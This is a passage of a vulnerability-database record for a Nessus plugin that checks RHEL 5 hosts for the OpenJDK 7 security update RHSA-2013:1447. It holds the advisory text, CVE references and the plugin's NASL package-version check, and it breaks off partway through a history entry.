{"id": "REDHAT-RHSA-2013-1447.NASL", "bulletinFamily": "scanner", "title": "RHEL 5 : java-1.7.0-openjdk (RHSA-2013:1447)", "description": "Updated java-1.7.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850, CVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.\n(CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "published": "2013-10-22T00:00:00", "modified": "2017-01-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=70536", "reporter": "Tenable", "references": ["https://www.redhat.com/security/data/cve/CVE-2013-5849.html", "https://www.redhat.com/security/data/cve/CVE-2013-5814.html", "https://www.redhat.com/security/data/cve/CVE-2013-3829.html", "https://www.redhat.com/security/data/cve/CVE-2013-5820.html", "https://www.redhat.com/security/data/cve/CVE-2013-5778.html", "https://www.redhat.com/security/data/cve/CVE-2013-5825.html", "https://www.redhat.com/security/data/cve/CVE-2013-5842.html", "https://www.redhat.com/security/data/cve/CVE-2013-5829.html", "https://www.redhat.com/security/data/cve/CVE-2013-5772.html", "https://www.redhat.com/security/data/cve/CVE-2013-5803.html", "https://www.redhat.com/security/data/cve/CVE-2013-5797.html", "https://www.redhat.com/security/data/cve/CVE-2013-5830.html", "https://www.redhat.com/security/data/cve/CVE-2013-5809.html", "https://www.redhat.com/security/data/cve/CVE-2013-5782.html", "https://www.redhat.com/security/data/cve/CVE-2013-5840.html", "https://www.redhat.com/security/data/cve/CVE-2013-5774.html", "https://www.redhat.com/security/data/cve/CVE-2013-5838.html", "https://www.redhat.com/security/data/cve/CVE-2013-5800.html", "https://www.redhat.com/security/data/cve/CVE-2013-4002.html", "https://www.redhat.com/security/data/cve/CVE-2013-5851.html", "https://www.redhat.com/security/data/cve/CVE-2013-5850.html", "https://www.redhat.com/security/data/cve/CVE-2013-5823.html", "https://www.redhat.com/security/data/cve/CVE-2013-5817.html", "https://www.redhat.com/security/data/cve/CVE-2013-5790.html", "https://www.redhat.com/security/data/cve/CVE-2013-5780.html", "https://www.redhat.com/security/data/cve/CVE-2013-5783.html", "http://rhn.redhat.com/errata/RHSA-2013-1447.html", "https://www.redhat.com/security/data/cve/CVE-2013-5784.html", "https://www.redhat.com/security/data/cve/CVE-2013-5802.html", "https://www.redhat.com/security/data/cve/CVE-2013-5804.html"], "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "type": "nessus", "lastseen": "2017-10-29T13:42:53", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated java-1.7.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850, CVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.\n(CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "edition": 2, "enchantments": {}, "hash": "5b3dcfcb47278006b5e4e04f590469299592621a01fdd79c2058f6a3856bc0dd", "hashmap": [{"hash": "118382c03abaa3b485dbe4bb05d7fce0", "key": "references"}, {"hash": "369eb856f7dc4cfd31b9acc3c0811267", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "bbd32ee296cd9916b85e8a3a2785f280", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "6b88e9e1569a7e403c2a9fd24de5e45b", "key": "href"}, {"hash": "f4263cb7ab9b83d87b6d91af466e0d19", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "5b253987191eeddaec27a34011982132", "key": "published"}, {"hash": "4fbd848df540aebf66e3dacc295ede8d", "key": "title"}, {"hash": "aa68929fd1eb36b57f2e26cc3d07d7d9", "key": "sourceData"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "0f53e31ba1befcd78a8de722fd263e97", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=70536", "id": "REDHAT-RHSA-2013-1447.NASL", "lastseen": "2017-01-06T02:16:22", "modified": "2017-01-05T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "70536", "published": "2013-10-22T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2013-5849.html", "https://www.redhat.com/security/data/cve/CVE-2013-5814.html", "https://www.redhat.com/security/data/cve/CVE-2013-3829.html", "https://www.redhat.com/security/data/cve/CVE-2013-5820.html", "https://www.redhat.com/security/data/cve/CVE-2013-5778.html", "https://www.redhat.com/security/data/cve/CVE-2013-5825.html", "https://www.redhat.com/security/data/cve/CVE-2013-5842.html", "https://www.redhat.com/security/data/cve/CVE-2013-5829.html", "https://www.redhat.com/security/data/cve/CVE-2013-5772.html", "https://www.redhat.com/security/data/cve/CVE-2013-5803.html", "https://www.redhat.com/security/data/cve/CVE-2013-5797.html", "https://www.redhat.com/security/data/cve/CVE-2013-5830.html", "https://www.redhat.com/security/data/cve/CVE-2013-5809.html", "https://www.redhat.com/security/data/cve/CVE-2013-5782.html", "https://www.redhat.com/security/data/cve/CVE-2013-5840.html", "https://www.redhat.com/security/data/cve/CVE-2013-5774.html", "https://www.redhat.com/security/data/cve/CVE-2013-5838.html", "https://www.redhat.com/security/data/cve/CVE-2013-5800.html", "https://www.redhat.com/security/data/cve/CVE-2013-4002.html", "https://www.redhat.com/security/data/cve/CVE-2013-5851.html", "https://www.redhat.com/security/data/cve/CVE-2013-5850.html", "https://www.redhat.com/security/data/cve/CVE-2013-5823.html", "https://www.redhat.com/security/data/cve/CVE-2013-5817.html", "https://www.redhat.com/security/data/cve/CVE-2013-5790.html", "https://www.redhat.com/security/data/cve/CVE-2013-5780.html", "https://www.redhat.com/security/data/cve/CVE-2013-5783.html", "http://rhn.redhat.com/errata/RHSA-2013-1447.html", "https://www.redhat.com/security/data/cve/CVE-2013-5784.html", "https://www.redhat.com/security/data/cve/CVE-2013-5802.html", "https://www.redhat.com/security/data/cve/CVE-2013-5804.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1447. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70536);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2017/01/05 16:29:44 $\");\n\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\", \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\", \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5800\", \"CVE-2013-5802\", \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\", \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\", \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5838\", \"CVE-2013-5840\", \"CVE-2013-5842\", \"CVE-2013-5849\", \"CVE-2013-5850\", \"CVE-2013-5851\");\n script_bugtraq_id(61310, 63082, 63089, 63095, 63098, 63101, 63102, 63103, 63106, 63110, 63111, 63115, 63118, 63120, 63121, 63128, 63131, 63133, 63134, 63135, 63137, 63142, 63143, 63146, 63148, 63149, 63150, 63153, 63154);\n script_osvdb_id(95418, 98524, 98525, 98526, 98531, 98532, 98535, 98536, 98544, 98546, 98548, 98549, 98550, 98551, 98552, 98558, 98559, 98560, 98562, 98563, 98564, 98565, 98566, 98567, 98568, 98569, 98571, 98572, 98573);\n script_xref(name:\"RHSA\", value:\"2013:1447\");\n\n script_name(english:\"RHEL 5 : java-1.7.0-openjdk (RHSA-2013:1447)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native\nimage parsing code. A specially crafted image file could trigger a\nJava Virtual Machine memory corruption and, possibly, lead to\narbitrary code execution with the privileges of the user running the\nJava Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for\nnon-public proxy classes. A remote attacker could possibly use this\nflaw to execute arbitrary code with the privileges of the user running\nthe Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D,\nCORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817,\nCVE-2013-5842, CVE-2013-5850, CVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image\nreading and writing code in the 2D component. An untrusted Java\napplication or applet could use these flaws to corrupt the Java\nVirtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use\nthis flaw to supply a crafted XML that would be processed without the\nintended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security\ncomponents processes XML inputs. A remote attacker could create a\ncrafted XML that would cause a Java application to use an excessive\namount of CPU and memory when processed. (CVE-2013-5825,\nCVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the\nLibraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting\ncomponents in OpenJDK. An untrusted Java application or applet could\nuse these flaws to bypass certain Java sandbox restrictions.\n(CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783,\nCVE-2013-5820, CVE-2013-5851, CVE-2013-5800, CVE-2013-5849,\nCVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the\nJava Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When\njavadoc documentation was generated from an untrusted Java source code\nand hosted on a domain not controlled by the code author, these issues\ncould make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings\nreturned by toString() methods. These flaws could possibly lead to an\nunexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data\nadded into the HTML pages it generated. Crafted content in the memory\nof a Java program analyzed using jhat could possibly be used to\nconduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using\nJGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-3829.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-4002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5772.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5774.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5778.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5780.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5782.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5783.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5784.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5790.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5797.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5800.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5802.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5803.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5804.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5809.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5814.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5817.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5820.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5829.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5838.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5840.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5842.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5849.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5850.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5851.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2013-1447.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:1447\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n }\n}\n", "title": "RHEL 5 : java-1.7.0-openjdk (RHSA-2013:1447)", "type": "nessus", "viewCount": 3}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2017-01-06T02:16:22"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated java-1.7.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java 